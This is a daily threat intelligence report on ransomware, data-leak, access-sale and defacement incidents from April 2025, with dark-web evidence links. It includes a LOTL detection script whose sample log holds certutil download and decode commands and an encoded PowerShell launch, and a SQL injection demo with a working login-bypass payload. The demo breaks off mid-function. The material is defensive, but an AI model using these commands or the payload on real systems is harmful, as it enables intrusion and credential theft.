[April-24-2025] Daily Cybersecurity Threat Report

1. Executive Summary

This report details significant cybersecurity incidents observed within the approximate 24-hour period leading up to April 24, 2025, based on analyzed intelligence feeds. The period was marked by continued high levels of ransomware activity, persistent data breach incidents facilitated through illicit online forums, and a thriving market for initial network access credentials.

Ransomware remains a dominant threat vector, with three distinct Ransomware-as-a-Service (RaaS) operations – MEDUSA, NightSpire, and RALord – identified targeting organizations across government administration, consumer services, non-profit, and manufacturing sectors in the US and Europe. These groups employ double extortion tactics, threatening data publication alongside encryption. Data breaches and leaks continue unabated, with actors leveraging underground forums like DarkForums.st and Leakbase.io to advertise or release compromised datasets, including sensitive user credentials, personal identifiable information (PII), and financial records from entities ranging from cybercrime forums themselves to banks and non-profit organizations.

The market for initial access remains highly active, demonstrating the specialization within the cybercrime economy. Actors such as ‘Incognito’, ‘Zimmer’, and ‘PaniTo’ were observed selling Remote Desktop Protocol (RDP), Virtual Private Network (VPN), and administrative access credentials on forums including XSS.is and DarkForums.st. This activity significantly lowers the barrier to entry for subsequent, more damaging attacks, particularly ransomware deployment.

Key threat actors observed include the established MEDUSA RaaS group [1], continuing its campaign against critical sectors, and emerging RaaS groups NightSpire [3] and RALord [5], rapidly establishing their presence. Various Initial Access Brokers (IABs) [7] and data leakers (‘krekti’, ‘goldshark11’, ‘listen0022’) [9] underscore the diverse roles within the threat landscape.

Observed trends highlight the continued prevalence and professionalization of the RaaS model, the critical enabling role of IABs, the resilience of cybercrime forums despite law enforcement actions, and the opportunistic nature of targeting across a wide array of industries and geographical locations.

2. Detailed Incident Analysis

Incident 1: Appalachian Regional Commission falls victim to MEDUSA Ransomware

  • Summary: The MEDUSA ransomware group has claimed responsibility for compromising the Appalachian Regional Commission (ARC), an entity operating within the US Government Administration sector. This incident is categorized as Ransomware. The threat actors assert they have exfiltrated a range of sensitive data, including identification documents, marriage certificates, financial reports, contact details, and employee addresses. Publication of this data is threatened within 10-11 days on the group’s leak site.
  • Threat Actor Profile: MEDUSA
  • Background & TTPs: MEDUSA operates as a Ransomware-as-a-Service (RaaS) platform, with activity tracked since at least June 2021 [1]. Initially functioning as a closed group, MEDUSA transitioned to an affiliate-based model. This involves recruiting Initial Access Brokers (IABs) through cybercriminal forums, sometimes offering substantial compensation ranging from $100 to $1 million USD for exclusive access provision [1]. MEDUSA employs a double extortion strategy, involving both data encryption and the threat of leaking exfiltrated data if ransom demands are not met. Data leaks are facilitated through their dedicated Tor-based “Medusa Blog” and a public Telegram channel named “information support” [11]. Common Tactics, Techniques, and Procedures (TTPs) include initial access via phishing campaigns or the exploitation of unpatched software vulnerabilities [2]. Once access is gained, actors utilize living-off-the-land (LOTL) techniques, heavily relying on PowerShell, Windows Management Instrumentation (WMI), and utilities like certutil.exe for execution, enumeration, and defense evasion [1]. Command obfuscation techniques, such as Base64 encoding and string manipulation, are employed to hinder detection [1]. Legitimate network scanning tools like Advanced IP Scanner and SoftPerfect Network Scanner are used for discovery [1]. There is evidence suggesting potential exploitation of Microsoft Exchange Server vulnerabilities [11] and the use of kernel drivers designed to terminate security products [11]. To increase pressure, MEDUSA often provides victims with options to purchase time extensions for leak deadlines, for example, at a cost of $10,000 per day [2].
  • Operational History & Targets: As of early 2025, MEDUSA actors have reportedly compromised over 300 organizations [1]. Their targeting spans a wide range of critical infrastructure sectors, including government, healthcare, education, legal services, insurance, technology, and manufacturing [1]. The group gained significant notoriety following incidents such as the breach of Minneapolis Public Schools [14]. While operating globally, MEDUSA demonstrates a pronounced focus on targeting organizations within the United States [11]. Reported ransom demands have shown considerable variability, ranging from $100,000 to as high as $15 million USD [2]. Some reporting suggests the group operating MEDUSA may be known as “Spearwing” [2].
  • Relevance to Incident: The targeting of the Appalachian Regional Commission, a US Government Administration-affiliated entity, aligns directly with MEDUSA’s established victimology, which includes critical infrastructure and a focus on US-based organizations [1]. The types of data claimed to be compromised (IDs, financial reports, employee PII) are consistent with sensitive information typically exfiltrated by ransomware groups for double extortion purposes [1]. The stated 10-11 day deadline for data publication corresponds with MEDUSA’s standard operating procedure of using countdown timers on their leak site to exert pressure on victims [11]. The sophisticated RaaS model allows MEDUSA to scale operations effectively [1]. Recruitment of specialized IABs indicates a functional division of labor, enabling the core group to concentrate on malware development and extortion management [1]. The use of both a dedicated leak site and a public Telegram channel maximizes visibility and pressure [11]. This structured, business-like approach signifies a high degree of operational maturity, positioning MEDUSA as a significant and persistent threat, particularly to sensitive sectors like government administration.
  • Incident Details & Potential Impact: The data allegedly compromised in this incident includes highly sensitive Personally Identifiable Information (PII), such as IDs and marriage certificates, alongside confidential organizational data like fund reports and invoices, and employee contact details and addresses. Public release of this information could lead to severe consequences, including identity theft, financial fraud targeting individuals and the organization, significant reputational damage for ARC, operational disruptions, and considerable distress for affected employees and potentially associated individuals. The double extortion model places ARC under substantial pressure to negotiate or pay the ransom demand to prevent data exposure.
  • Evidence:
  • Published URL: http://s7lmmhlt3iwnwirxvgjidl6omcblvw2rg75txjfduy73kx5brlmiulad.onion/detail?id=5a5c1f956bb0b7c010293c41ad470f67
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/6e8353e2-112b-458d-b2ed-01a9fa5f6d26.png, https://d34iuop8pidsy8.cloudfront.net/04c21bb9-0ed4-4af3-9a46-7487dba6f8aa.png
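The LOTL behaviours attributed to MEDUSA above (certutil.exe for decoding or downloading, Base64-encoded PowerShell, execution through WMI) are the kind of thing a defender hunts for in process-creation telemetry. The following detection sketch is an added example written for this report, not MEDUSA tooling or any vendor’s rule set; the log records, host names and encoded command are constructed, and the record layout (host, parent image, image, command line) is an assumed simplification of Sysmon Event ID 1 / Windows 4688 fields.

```python
"""Detection sketch for MEDUSA-style living-off-the-land (LOTL) activity.

Flags three behaviours the report attributes to MEDUSA in process-creation
records: certutil.exe used to decode or fetch payloads, PowerShell launched
with a Base64 -EncodedCommand (which is decoded for the analyst), and shells
spawned under the WMI provider host.  All sample data is constructed.
"""
import base64
import re
from dataclasses import dataclass

# Plaintext of the encoded PowerShell used in the constructed sample below.
PLAIN_COMMAND = "Get-WmiObject Win32_Process | Select-Object Name, CommandLine"


def encode_powershell(command: str) -> str:
    """PowerShell's -EncodedCommand expects Base64 over UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed records: "<host>|<parent image>|<image path>|<command line>".
SAMPLE_LOG = (
    "WS01|explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c dir\n"
    "WS01|cmd.exe|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -decode C:\\Users\\Public\\upd.txt C:\\Users\\Public\\upd.exe\n"
    "WS02|cmd.exe|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt\n"
    "WS02|wmiprvse.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    f"powershell.exe -nop -w hidden -enc {encode_powershell(PLAIN_COMMAND)}\n"
    "WS03|services.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -verify C:\\certs\\srv.cer\n"
)


@dataclass
class Finding:
    host: str
    rule: str
    command_line: str
    detail: str


# certutil switches used for payload staging rather than certificate work.
CERTUTIL_ABUSE = re.compile(r"\bcertutil(?:\.exe)?\b.*?\s(-decode|-encode|-urlcache)\b", re.I)
# -e / -enc / -EncodedCommand followed by a Base64 blob.
PS_ENCODED = re.compile(r"\bpowershell(?:\.exe)?\b.*?\s-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
WMI_PARENTS = {"wmiprvse.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def decode_encoded_command(b64: str):
    """Return the UTF-16LE plaintext of an -EncodedCommand blob, or None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_record(record: str) -> list:
    parts = record.split("|", 3)
    if len(parts) != 4:
        return []  # malformed record: skip rather than guess
    host, parent, image, cmdline = parts
    image_name = image.rsplit("\\", 1)[-1].lower()
    findings = []

    m = CERTUTIL_ABUSE.search(cmdline)
    if m:
        findings.append(Finding(host, "certutil_lolbin", cmdline,
                                f"certutil {m.group(1).lower()} used for decode/download"))

    m = PS_ENCODED.search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
        detail = f"decoded: {decoded}" if decoded else "undecodable -EncodedCommand payload"
        findings.append(Finding(host, "powershell_encoded", cmdline, detail))

    # A shell whose parent is the WMI provider host indicates WMI-driven execution.
    if parent.lower() in WMI_PARENTS and image_name in SHELLS:
        findings.append(Finding(host, "wmi_spawned_shell", cmdline, f"{image_name} launched by {parent}"))
    return findings


def analyze(log_text: str) -> list:
    """Run every rule over every non-empty record and return the findings in order."""
    return [f for line in log_text.splitlines() if line.strip() for f in analyze_record(line)]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(f"[{finding.rule}] {finding.host}: {finding.detail}")
```

The benign `certutil -verify` record and the plain `cmd.exe /c dir` launch produce no findings, which is the point: the rules key on the specific switches and parent-child pairings, not on the presence of the binaries themselves.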

Incident 2: Alleged data breach of Breached.fi

  • Summary: The threat actor ‘krekti’ has claimed a data leak originating from Breached.fi, identified as an Information Services platform likely operating within the cybercrime forum ecosystem, potentially connected to the lineage of BreachForums. This incident is categorized as a Data Breach. The actor alleges the compromised data includes user credentials (usernames, hashed passwords), email addresses, IP addresses, registration and login timestamps, and other user-associated details. The claim was posted on the ‘darkforums.st’ platform.
  • Threat Actor Profile: krekti
  • Background & TTPs: ‘krekti’ is the actor claiming responsibility for this data leak on the ‘darkforums.st’ forum. While specific intelligence on ‘krekti’ is not available from the provided materials, their actions place them squarely within the ecosystem of cybercrime forums dedicated to the trade and leakage of compromised data. Platforms like the various iterations of BreachForums [10] and similar sites [17] function as marketplaces where stolen credentials, databases, hacking tools, and other illicit services are exchanged [10]. Participants range from sophisticated threat actors to individuals trading data often sourced from infostealer malware infections [9]. The act of leaking data from a rival or related forum can be motivated by various factors, including building reputation, causing disruption, or enacting retaliation against competitors.
  • Operational History & Targets: The specific operational history of ‘krekti’ remains unknown based on available information. Their current target is a cybercrime forum itself, a phenomenon not uncommon within the volatile underground community. For instance, the database of the original BreachForums was itself leaked online [10].
  • Relevance to Incident: ‘krekti’ is operating as a data leaker or trader, utilizing a known cybercrime platform (‘darkforums.st’) to publicize an alleged breach of another similar platform (‘Breached.fi’). This behavior is characteristic of interactions within this ecosystem [10]. The types of data allegedly compromised – credentials, email addresses, IP addresses – represent standard commodities frequently traded on such forums [9]. The cybercrime forum landscape is notoriously unstable, subject to frequent law enforcement takedowns (e.g., RaidForums, multiple BreachForums seizures) and subsequent reemergences or replacements [10]. Internal conflicts and competition for status are rife [18]. Leaking data from a competitor serves to damage the rival’s reputation, potentially attract users to the hosting forum, and enhance the leaker’s own standing [10]. This incident exemplifies the inherent risks and often self-destructive dynamics present within these illicit online marketplaces.
  • Incident Details & Potential Impact: If the leaked data is authentic, it poses a significant risk to users of Breached.fi, who are likely individuals involved in or researching cybercrime. Exposed email addresses and hashed passwords can be exploited for credential stuffing attacks against other online services, targeted phishing campaigns, or attempts to identify individuals behind online aliases. Leaked IP addresses and timestamps could further aid de-anonymization efforts by law enforcement agencies or rival malicious actors. This incident inherently damages the reputation and perceived operational security of the Breached.fi platform.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-Breached-fi-Anastasia-Owner-Mail-password-salt-IP
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/08ec60f8-2dd6-4d05-883d-23b8ea665d72.png

Incident 3: Conditioned Air Company falls victim to MEDUSA Ransomware

  • Summary: The MEDUSA ransomware group claims another victim: Conditioned Air Company, LLC, a US-based company operating in the Consumer Services sector (likely HVAC or similar). This attack is categorized as Ransomware. The group alleges exfiltration of data including blueprints, photographs, maps, financial slips, reports, phone numbers, addresses, and invoice bills. Publication of the data is threatened within 8-9 days.
  • Threat Actor Profile: MEDUSA
  • Background & TTPs: (Refer to Incident 1 profile) MEDUSA operates as a RaaS group known for double extortion via its “Medusa Blog” and Telegram channel, recruitment of IABs, targeting diverse sectors, and employing specific TTPs like LOTL techniques and PowerShell abuse [1].
  • Operational History & Targets: (Refer to Incident 1 profile) MEDUSA has a history of targeting various sectors, including manufacturing and other commercial entities, with a significant number of victims located in the US [1]. While known for targeting critical infrastructure [1], MEDUSA’s victimology demonstrates opportunistic targeting across a broader range of commercial entities [11]. This opportunistic approach likely stems from the RaaS model, where affiliates or IABs may target organizations based on perceived vulnerability or ease of access rather than solely strategic value [20]. Less prominent commercial entities might possess weaker security postures, presenting easier targets for affiliates.
  • Relevance to Incident: The targeting of a US-based Consumer Services company aligns with MEDUSA’s broad, often opportunistic targeting strategy [1]. The types of data claimed (blueprints, reports, invoices, contact details) represent typical business-sensitive information leveraged in extortion schemes [1]. The 8-9 day deadline is consistent with their practice of using time pressure to compel payment [11]. This incident reinforces that organizations outside traditionally defined “critical” sectors remain significant targets for major RaaS operations if vulnerabilities are present.
  • Incident Details & Potential Impact: The compromise potentially involves sensitive intellectual property (blueprints, maps), confidential operational data (reports, slips), financial records (invoices), and potentially customer or employee PII (phone numbers, addresses). Public disclosure could lead to the loss of proprietary designs, operational disruption, facilitation of fraud, damage to the company’s reputation, and potential privacy violations depending on the specific nature of the contact information compromised.
  • Evidence:
  • Published URL: http://s7lmmhlt3iwnwirxvgjidl6omcblvw2rg75txjfduy73kx5brlmiulad.onion/detail?id=266d0184675acdf35fcce37c0e4fd529
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/796067da-94eb-412c-b678-443a29f6284d.png, https://d34iuop8pidsy8.cloudfront.net/c7ae1f94-5fbe-4f27-bf71-6ff1e8470e6b.png

Incident 4: Alleged sale of unauthorized access to multiple companies (Densay)

  • Summary: The threat actor ‘Incognito’ is advertising the sale of Remote Desktop Web Access (RDWeb) and VPN access for multiple companies on the XSS.is forum. Densay, an automotive company based in the UAE, is specifically named as one of the victims. This activity is categorized as an Initial Access sale.
  • Threat Actor Profile: Incognito
  • Background & TTPs: ‘Incognito’ operates as an Initial Access Broker (IAB). IABs are specialized cyber threat actors who gain unauthorized access to networks and then sell this access to other criminals, frequently ransomware operators [7]. Common methods for gaining access include exploiting vulnerabilities in remote access services like RDP and VPNs, phishing campaigns, brute-force attacks, password spraying, or utilizing credentials stolen via infostealer malware [8]. IABs typically advertise the type of access obtained (e.g., RDP, VPN, Active Directory credentials, web shells, control panel access) on underground forums such as XSS.is and Exploit.in [20]. Advertisements often include general victim information like industry sector and revenue, sometimes anonymizing the specific company, though direct naming also occurs [23]. ‘Incognito’ is offering RDWeb (a component related to RDP) and VPN access, both common and valuable types of access sold by IABs [8]. The XSS.is forum is a well-known marketplace for IAB activities [23].
  • Operational History & Targets: Specific historical activity for ‘Incognito’ is not detailed in the available materials. IABs often target organizations opportunistically, based on discoverable vulnerabilities or the availability of compromised credentials [20]. The mention of a UAE-based automotive firm indicates their operational scope can be international and diverse.
  • Relevance to Incident: The actions attributed to ‘Incognito’—selling verified VPN and RDWeb access on the XSS.is forum—are entirely consistent with the definition and typical operational patterns of an IAB [7]. The public nature (within the cybercrime community) of IAB marketplaces like XSS.is provides a potential, though challenging, source of early warning intelligence. IABs need to advertise their access to attract buyers [20]. These advertisements, even if partially anonymized, contain valuable clues [23]. Proactive monitoring of these forums can allow organizations to detect if their access is being sold before a major attack, like ransomware deployment, is launched [22]. This incident serves as a real-time example of such intelligence being available.
  • Incident Details & Potential Impact: The availability of verified RDWeb and VPN access for sale presents an immediate and severe security risk to the victim organizations, including Densay. Purchasers of this access, such as ransomware groups, data thieves, or state-sponsored actors, gain a direct foothold into the target networks. This effectively bypasses the often difficult initial intrusion phase, significantly accelerating the timeline for attacks like ransomware deployment, large-scale data exfiltration, espionage, or sabotage [8].
  • Evidence:
  • Published URL: https://xss.is/threads/136640/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/3cbcdfcb-1c9e-41a3-9b22-7b5bf5bea636.png

Incident 5: Alleged Data Leak of Vietnam Bank

  • Summary: The threat actor ‘goldshark11’ claims on the darkforums.st platform to have obtained and leaked data from an unspecified bank in Vietnam. This incident is categorized as a Data Leak. The actor alleges the compromised data includes highly sensitive PII (12-digit ID cards, full names, dates of birth, permanent addresses) and financial information (current bank account balances). Sample screenshots were provided as purported proof.
  • Threat Actor Profile: goldshark11
  • Background & TTPs: ‘goldshark11’ is functioning as a data leaker and potential seller on the darkforums.st cybercrime forum. Specific intelligence regarding this actor is not present in the provided materials. Their actions align with common practices observed on such forums, where actors advertise, leak, or sell databases acquired through various means, including direct hacking, purchasing from other criminals, or exploiting system vulnerabilities [10]. Providing data samples is a standard tactic to demonstrate the authenticity and value of the compromised data to potential buyers or to gain notoriety within the community [9]. Financial institutions are frequent targets due to the inherent value of the financial and personal data they hold [27].
  • Operational History & Targets: Specific operational history for ‘goldshark11’ is unknown. The current target is identified as the Vietnamese banking sector.
  • Relevance to Incident: ‘goldshark11’ is utilizing a known cybercrime forum (‘darkforums.st’) to advertise allegedly stolen, highly sensitive financial and personal data originating from a bank. The provision of samples is a typical method to validate the claim. This behavior fits the established pattern of data leak and sale activities prevalent in the cybercrime underground [16]. The targeting of a specific geographic region (Vietnam) and the claim of possessing highly sensitive data types (national IDs, bank balances) suggest a potentially significant compromise. Financial data combined with detailed PII is exceptionally valuable for sophisticated fraud and identity theft [18].
  • Incident Details & Potential Impact: If the data leak is authentic, the consequences are extremely severe. The exposure of national identification numbers, full personal details, addresses, and particularly current bank account balances poses a massive risk to the affected bank customers. This information can fuel targeted financial fraud, identity theft, highly personalized social engineering attacks, and significant financial losses. For the unnamed Vietnamese bank, this represents a major security breach, likely resulting in substantial reputational damage, loss of customer trust, significant remediation costs, and potential regulatory penalties. The inclusion of bank balances is particularly alarming as it allows attackers to prioritize high-value targets.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-vietnam-bank
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/bb9c2cf9-836d-40f4-b6f7-62d86ac566bc.png

Incident 6: Alleged Leak of USA Human Rights Database

  • Summary: Threat actor ‘listen0022’ claims on the leakbase.io forum to have obtained and leaked a database associated with “USA Human Rights,” categorized under the Non-profit & Social Organizations industry. This incident is classified as a Data Leak. The compromised data purportedly includes first names, last names, email addresses, place/location information, phone numbers, and addresses.
  • Threat Actor Profile: listen0022
  • Background & TTPs: ‘listen0022’ is identified as a data leaker operating on cybercrime forums, specifically leakbase.io in this instance. No specific background information on this actor is available from the provided materials. Their modus operandi involves advertising a database containing PII (names, various contact details) allegedly sourced from a non-profit or social organization. This activity is consistent with behaviors observed on platforms like BreachForums and similar data leak sites [10]. The motivation behind such leaks can be financial (selling the database), reputational gain within the cybercrime community, or potentially ideological if targeting a specific type of organization. Leakbase.io serves a similar function to other forums dedicated to the distribution of compromised data.
  • Operational History & Targets: Specific operational history for ‘listen0022’ is unknown. The current target is described vaguely as a “USA Human Rights Database,” likely belonging to a non-profit organization operating within that field.
  • Relevance to Incident: ‘listen0022’ is performing a typical data leak operation: advertising the availability of PII allegedly stolen from a specific type of organization (non-profit/human rights) on a dedicated forum [18]. Non-profit organizations are recognized targets for various threat actors [1]. Data leaks involving such organizations carry unique risks beyond purely financial motivations. These groups often handle sensitive information related to vulnerable individuals, activists, or politically charged issues. Furthermore, they may possess fewer cybersecurity resources compared to large corporations [19]. Data exfiltrated from these organizations can be weaponized by state-sponsored actors, political adversaries, or extremist groups for purposes such as intimidation, surveillance, suppression of dissent, or targeted harassment, extending the impact far beyond monetary loss [19].
  • Incident Details & Potential Impact: The public release of names, email addresses, phone numbers, and physical addresses associated with a human rights organization presents potentially severe risks. Individuals listed in the database – who could be activists, donors, staff members, volunteers, or beneficiaries of the organization’s services – could become targets for harassment, doxing (maliciously publishing private information), sophisticated phishing attacks, social engineering, or even physical threats. The level of risk depends heavily on the specific nature of the organization and the motives of adversaries who might acquire the data. The organization itself faces significant reputational damage, loss of trust from its constituents, and potential legal or regulatory consequences related to data protection.
  • Evidence:
  • Published URL: https://leakbase.io/threads/usa-humanrights-database.37966/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/6a406bfa-cc8f-4717-8d16-9d77e396aa3a.png

Incident 7: KAL EGY 319 targets the website of Aqua General

  • Summary: The group identifying itself as ‘KAL EGY 319’ claims to have defaced the website of Aqua General, a manufacturing company based in Egypt. This incident is categorized as Defacement. The claim was disseminated via a Telegram channel.
  • Threat Actor Profile: KAL EGY 319
  • Background & TTPs: ‘KAL EGY 319’ appears to operate as a website defacement group. Website defacement typically involves unauthorized alteration of a website’s visual content, often to display political messages, promote hacktivist agendas, gain notoriety, or simply cause disruption. This type of attack is generally considered less sophisticated compared to data breaches or ransomware deployment. The use of Telegram for broadcasting claims is a common practice among various threat actors, including hacktivist groups, ransomware operators, and others seeking publicity [4]. The name component “EGY” might suggest an Egyptian origin or a specific focus on Egyptian targets. The provided sources [28] and [29] appear unrelated and offer no specific intelligence on this group or its activities.
  • Operational History & Targets: Specific operational history for ‘KAL EGY 319’ is unknown. The current identified target is an Egyptian manufacturing company, Aqua General.
  • Relevance to Incident: The group’s actions – performing a website defacement and announcing it via Telegram – are consistent with the behavior patterns of hacktivist entities or groups focused on low-level disruption and visibility. While often dismissed as mere “digital graffiti,” website defacement serves as a clear indicator of a successful intrusion. It signifies that an attacker was able to bypass security controls to gain sufficient access to modify website content. The underlying vulnerability exploited for the defacement – whether weak credentials, an unpatched content management system, or a server misconfiguration – might potentially be leveraged for more severe attacks, such as data exfiltration, malware distribution, or deeper network compromise. Therefore, a defacement should be treated as a warning sign of a potentially weak security posture requiring thorough investigation.
  • Incident Details & Potential Impact: The primary impact of website defacement is reputational damage to the targeted organization and temporary disruption of the website’s normal function and appearance. It clearly indicates a security vulnerability has been exploited. While generally less severe in direct impact than data breaches or ransomware, defacement can erode customer and public trust and necessitates security resources to restore the website, investigate the intrusion vector, and remediate the underlying vulnerability to prevent further exploitation.
  • Evidence:
  • Published URL: https://t.me/KALE3G1Y9/383
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/fc689392-8af1-4fb2-938a-406174a08810.png

Incident 8: MFR CULTIVONS LES REUSSITES falls victim to NightSpire Ransomware

  • Summary: The emerging ransomware group NightSpire has claimed responsibility for an attack against MFR CULTIVONS LES REUSSITES, identified as a Non-profit & Social Organization based in France (the name suggests a focus on rural education or development). This incident is categorized as Ransomware. The actors claim to have exfiltrated 1 Terabyte (TB) of data and threaten to publish it on their Tor-based leak site within 5-6 days.
  • Threat Actor Profile: NightSpire
  • Background & TTPs: NightSpire is a relatively new ransomware and extortion operation, observed to be active since early March 2025 [3]. The group operates a dedicated leak site on the Tor network, first identified around mid-March 2025 [3]. Intelligence suggests the operators, potentially using aliases like ‘xdragon128’ and ‘cuteliyuan’, may possess limited experience, indicated by missteps such as attempting ransomware affiliate recruitment on forums where such activity is explicitly banned [3]. Their primary motivation appears to be financial gain, and targeting seems opportunistic [3]. Known TTPs include exploiting vulnerabilities in external perimeter services for initial access (specifically citing CVE-2024-55591 affecting FortiOS) [3]. They utilize legitimate file transfer tools (e.g., WinSCP, MEGACmd) and living-off-the-land binaries (LOLBins) for data exfiltration and defense evasion [3]. The group shows signs of attempting to expand its operations, having advertised for negotiation specialists [3]. It is important to distinguish NightSpire from the similarly named, but distinct and older, “Night Sky” ransomware group [30]. The ransomware ecosystem is dynamic, constantly seeing new entrants [31]. These groups often emerge to fill voids left by disrupted operations (like the recent actions against LockBit and ALPHV [13]) or may leverage leaked source code from older ransomware families [30]. Even groups with seemingly inexperienced operators can pose a significant threat by utilizing available toolkits and exploiting common vulnerabilities. Establishing a leak site and claiming victims is a critical step for new groups to build a reputation and exert pressure [11].
  • Operational History & Targets: As an emerging group active since February/March 2025 [3], NightSpire had claimed responsibility for at least 11 victims by late March/early April 2025 [3]. Initial targets were primarily small to medium-sized businesses across sectors including manufacturing, retail, chemical, maritime, and accounting services [3]. Victims were identified in the United States, Japan, Thailand, the United Kingdom, China, and Poland [4]. This incident adds France to their geographic scope and the Non-profit sector to their victimology.
  • Relevance to Incident: This attack aligns with NightSpire’s established modus operandi: utilizing a Tor leak site for extortion [3], imposing a short deadline for data publication to pressure the victim, and targeting organizations within Europe [4]. The claim of exfiltrating a large volume of data (1 TB) is typical rhetoric used in ransomware attacks to emphasize the severity of the breach. Targeting a non-profit organization fits with the group’s observed opportunistic approach [3].
  • Incident Details & Potential Impact: The compromise of 1 TB of data from a non-profit or educational organization could involve the exposure of highly sensitive information. This might include personal records of students, beneficiaries, or members; staff PII and employment details; confidential financial data and donor information; proprietary research or educational materials; or internal operational plans. Public disclosure of such data could lead to severe privacy violations, significant reputational damage, potential breaches of data protection regulations (such as GDPR in France), operational disruption, and loss of trust from stakeholders. The large claimed volume of exfiltrated data, if accurate, suggests extensive network penetration.
  • Evidence:
  • Published URL: http://nspireyzmvapgiwgtuoznlafqvlyz7ey6himtgn5bdvdcowfyto3yryd.onion/datas.php
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/dee8a482-7a10-4fb7-bfd1-819f19deb5b9.png

Incident 9: Alleged sale of access to an unidentified US OpenCart platform

  • Summary: Threat actor ‘Zimmer’ is advertising on the exploit.in forum the sale of access to a compromised e-commerce store based in the US that utilizes the OpenCart platform. This incident is categorized as an Alert, specifically involving the sale of Initial Access. Access was reportedly gained via SQL injection. The offering includes administrator account hashes, direct panel access, and the option for the buyer to upload a web shell. The compromised site uses Authorize.net for payment processing.
  • Threat Actor Profile: Zimmer
  • Background & TTPs: ‘Zimmer’ is operating as an IAB, specializing in compromising and selling access to websites, particularly e-commerce platforms. Their reported method involves exploiting a specific technical vulnerability, SQL injection (SQLi), to achieve administrative-level access. The actor is offering various levels of access (admin credentials, panel access, web shell upload capability), catering to the diverse needs and technical capabilities of potential buyers. The sale is taking place on exploit.in, a known underground forum where illicit goods and services, including network access, are traded [27]. Access involving payment gateways like Authorize.net is considered particularly valuable within the cybercrime economy [27]. The exploitation of specific technical vulnerabilities like SQLi is a common method for IABs to gain initial access [20]. This access is then packaged and sold, effectively commoditizing the vulnerability [8]. Buyers, who may lack the skills to find or exploit vulnerabilities themselves, can purchase the resulting access to facilitate their own malicious activities, such as deploying payment card skimmers or ransomware [20].
  • Operational History & Targets: Specific operational history for ‘Zimmer’ is unknown. The current target is an unnamed US-based e-commerce website running OpenCart and utilizing Authorize.net. IABs frequently target platforms known for common vulnerabilities or misconfigurations [8].
  • Relevance to Incident: The reported actions of ‘Zimmer’ – exploiting a web vulnerability (SQLi), obtaining administrative access, and offering it for sale on a known cybercrime forum (exploit.in) – are characteristic behaviors of an IAB [8]. Offering the capability to upload a web shell significantly increases the potential impact and value of the access, as it allows for persistent and deeper compromise of the server [20].
  • Incident Details & Potential Impact: Gaining administrative access to an e-commerce platform, especially one integrated with a payment processor like Authorize.net, represents a highly critical security breach. A buyer of this access could potentially steal customer PII, including names, addresses, and crucially, payment card details. They could inject malicious JavaScript (digital skimmers, often associated with Magecart attacks) to capture payment information in real-time, redirect legitimate payments to fraudulent accounts, deface the website, or use the compromised server to host malware or launch further attacks. The underlying SQL injection vulnerability itself indicates a severe security flaw in the website’s code or configuration. The ability to upload a web shell grants the attacker persistent, server-level access, compounding the risk. This poses an immediate and severe threat to the operational integrity of the e-commerce store, the financial security of its customers, and its overall reputation.
  • Evidence:
  • Published URL: https://forum.exploit.in/topic/257940/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/c31448c2-0ac6-4b8b-8298-875ef715436e.png
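
To make the Incident 9 entry point concrete, the following is an added example written for this report; it is not OpenCart’s code and not the actor’s. It shows a login lookup that splices user input into SQL and hands an attacker the administrator row (hash and salt, exactly what the advertisement offers), beside the parameterized form that closes the hole. It runs against an in-memory SQLite database with constructed rows; the table layout and the salted-SHA1 password scheme are assumptions for illustration only.

```python
"""
Added example for Incident 9 (not OpenCart's code and not the actor's):
how a login lookup that splices user input into SQL hands an attacker the
administrator table, beside the parameterized form that closes the hole.
Runs against an in-memory SQLite database with constructed rows; the
table layout and the salted-SHA1 scheme are assumptions for illustration.
"""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a single admin row with a salted hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (user_id INTEGER, username TEXT, "
        "password TEXT, salt TEXT)"
    )
    salt = "s4lt"
    pw_hash = hashlib.sha1((salt + "correct-horse").encode()).hexdigest()
    conn.execute("INSERT INTO user VALUES (1, 'admin', ?, ?)", (pw_hash, salt))
    conn.commit()
    return conn


def lookup_user_vulnerable(conn, username):
    """VULNERABLE: the username is pasted into the SQL text, so a quote in
    the input ends the string literal and the rest is parsed as SQL.
    Returns the first matching (user_id, username, password, salt) or None."""
    sql = ("SELECT user_id, username, password, salt FROM user "
           f"WHERE username = '{username}'")
    return conn.execute(sql).fetchone()


def lookup_user_safe(conn, username):
    """HARDENED: the value is bound as a parameter. The driver sends it
    as data, so it can never alter the statement's structure."""
    sql = "SELECT user_id, username, password, salt FROM user WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()


def verify_password(row, candidate):
    """Checks a candidate password against the stored salted hash. This is
    the offline work a buyer of 'admin hashes' still has to do."""
    if row is None:
        return False
    _, _, stored_hash, salt = row
    return hashlib.sha1((salt + candidate).encode()).hexdigest() == stored_hash


def demo():
    """Runs both lookups with a classic tautology payload and returns the
    outcomes so they can be checked."""
    conn = make_db()
    payload = "x' OR '1'='1"          # closes the literal, appends a tautology
    leaked = lookup_user_vulnerable(conn, payload)   # admin row, hash and salt
    blocked = lookup_user_safe(conn, payload)        # None: no such username
    legit = lookup_user_safe(conn, "admin")
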